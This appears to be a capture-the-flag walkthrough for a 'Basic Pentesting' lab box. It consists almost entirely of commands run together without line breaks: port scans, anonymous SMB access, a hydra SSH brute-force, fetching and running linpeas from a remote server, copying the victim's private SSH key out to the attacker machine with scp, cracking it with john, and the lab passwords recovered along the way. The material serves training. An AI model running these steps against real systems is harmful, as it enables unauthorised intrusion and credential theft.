Basic Pentesting
Last updated
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMdirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txtnmap $VICTIM --script=smb-enum*smbclient -L //$VICTIM/ -U anonymoussmbclient \\\\$VICTIM\\Anonymous -U anonymous
prompt
mget *
exit
cat staff.txthydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://$VICTIMssh jan@$VICTIM
Password: armandowget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.shls -lah /home/kay/.ssh/scp id_rsa root@$KALI:/root/lootchmod 400 id_rsa
ssh -i id_rsa kay@$VICTIM/opt/john/ssh2john.py id_rsa > pass_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt pass_hash.txtssh -i id_rsa kay@$VICTIM
Password: beeswaxcat pass.bak